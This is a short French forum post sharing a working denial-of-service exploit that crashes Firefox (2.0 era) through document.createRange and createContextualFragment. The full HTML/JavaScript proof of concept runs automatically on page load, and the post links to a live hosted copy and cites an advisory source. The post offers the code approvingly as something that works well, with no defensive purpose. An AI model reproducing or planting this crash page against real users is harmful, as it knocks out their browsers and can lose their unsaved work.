Bsoir,
Alors la faille se nomme : Firefox createRange Crash (Exploit)
Et elle fonctionne plutot bien :
http://folcan.nix3.fr/exploit/death.htmlEt le tout, avec quelques lignes de javascript :
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;
range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>
Voilou, notons qu'apparement il existe la meme pour IE basé sur un DoS, mais pas reussi à m'en servir...
(source :
http://www.securiteam.com/exploits/6H00W0AH5E.html)
PS : rooo le con, j'ai cliqué sur le lien, ca ma shooter FF, heureusement que la 2.0 possède la restauration de session !! Et je viens de decouvrir avec joie, que en plus de restaurer FF, il restaure les onglet, les multi-browserage, et aussi les champs de formulaire, donc mon message, il est resté

. Marche nikel ce truc !
++